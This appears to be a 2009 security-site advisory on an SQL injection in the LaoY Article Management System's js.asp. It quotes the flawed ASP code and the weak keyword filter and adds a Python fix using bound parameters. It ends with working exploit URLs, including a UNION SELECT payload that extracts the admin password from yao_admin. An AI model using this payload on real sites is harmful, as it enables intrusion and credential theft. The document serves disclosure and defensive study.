Date: 2009-06-16 14:57:00  Source: compiled by this site

老Y文章管理系统 (LaoY Article Management System) SQL injection 0day [Network technology]


幻泉 [B.S.N], 黑客防线 (Hacker Defense)


Severity: Medium
Vulnerability description:

The vulnerability is in js.asp. Let's start with the source code.


Code:

If CheckStr(Request("ClassNo")) <> "" then
    ClassNo = split(CheckStr(Request("ClassNo")),"|")
    ' The parameter is fetched and run through the CheckStr filter here, but the filter does not seem to have any effect; the value is then split into an array
    on error resume next
    NClassID = LaoYRequest(ClassNo(0))
    NClassID1 = LaoYRequest(ClassNo(1))
    ' The first two array elements are integer-filtered here; there is no vulnerability at this point
End if

num = LaoYRequest(request.querystring("num")) ' num must be >= 1 here
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

If NclassID<>"" and NclassID1="" then
    If Yao_MyID(NclassID)="0" then
        SQL=SQL&" and Class"
    else
        MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
        SQL=SQL&" and ClassID in ("&MyID&")"
    End if
elseif NclassID<>"" and NclassID1<>"" then
    MyID = Replace(""&Request("ClassNo")&"","|",",")
    SQL=SQL&" and ClassID in ("&MyID&")"
    ' The problem is here: the raw ClassNo is written into the query without any further filtering
End if

select case topType
    case "new" sql=sql&" order by DateAndTime desc,ID desc"
    case "hot" sql=sql&" order by hits desc,ID desc"
    case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select

set rs = conn.execute(sql)
if rs.bof and rs.eof then
    str=str+"没有符合条件的文章"
........

-------------------------------

function.asp


Code:

function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","&lt;"),">","&gt;"),chr(13),"")," ","")
    CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
    CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function
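The root cause above is that the second branch re-reads Request("ClassNo") instead of using the already integer-filtered NClassID values, and concatenates it straight into the SQL string. As an added example (not code from this page or from the LaoY project), the following Python shows the defensive pattern: validate every pipe-separated segment of ClassNo as an integer, the check the page attributes to LaoYRequest, and bind the values with placeholders instead of building the query by string concatenation. It assumes an in-memory SQLite table with constructed rows standing in for the Yao_Article columns named on the page (ID, Title, ClassID, yn), with LIMIT replacing the page's `Select top`.

```python
import re
import sqlite3

# Constructed sample rows standing in for Yao_Article (ID, Title, ClassID); not real data.
SAMPLE_ROWS = [(1, "First", 1), (2, "Second", 2), (3, "Third", 3), (4, "Fourth", 9)]


def parse_class_list(raw):
    """Validate the pipe-separated ClassNo parameter.

    Every segment must be a decimal integer, so the value can only ever be a
    list of class IDs. Returns the integers, or None when any segment fails.
    This is an allow-list check, unlike the keyword blacklist in CheckStr.
    """
    if not raw:
        return None
    segments = raw.split("|")
    if not all(re.fullmatch(r"\d+", s) for s in segments):
        return None
    return [int(s) for s in segments]


def build_query(num, raw_class_no):
    """Return (sql, params); user input only reaches the database as bound parameters."""
    if not re.fullmatch(r"\d+", str(num)) or int(num) < 1:
        raise ValueError("num must be an integer >= 1")
    ids = parse_class_list(raw_class_no)
    if ids is None:
        raise ValueError("ClassNo must be integers separated by '|'")
    placeholders = ",".join("?" * len(ids))  # one ? per class ID
    sql = ("SELECT ID, Title, ClassID FROM Yao_Article "
           f"WHERE yn = 0 AND ClassID IN ({placeholders}) "
           "ORDER BY ID DESC LIMIT ?")
    return sql, [*ids, int(num)]


def run_query(num, raw_class_no):
    """Execute the bound query against an in-memory SQLite copy of the table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Yao_Article (ID INTEGER, Title TEXT, "
                 "ClassID INTEGER, yn INTEGER DEFAULT 0)")
    conn.executemany("INSERT INTO Yao_Article (ID, Title, ClassID) VALUES (?, ?, ?)",
                     SAMPLE_ROWS)
    sql, params = build_query(num, raw_class_no)
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    print(run_query(2, "1|2|3"))  # a well-formed ClassNo list
    for bad in ("1|1|1[SQL]", "1|1|1) union select 1"):
        try:
            build_query(1, bad)
        except ValueError as exc:
            print("rejected:", exc)
```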


Exploit code:
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1  #### retrieves the password

Note: this vulnerability was tested on version 2.4. Download from chinaz: http://down.chinaz.com/soft/23126.htm

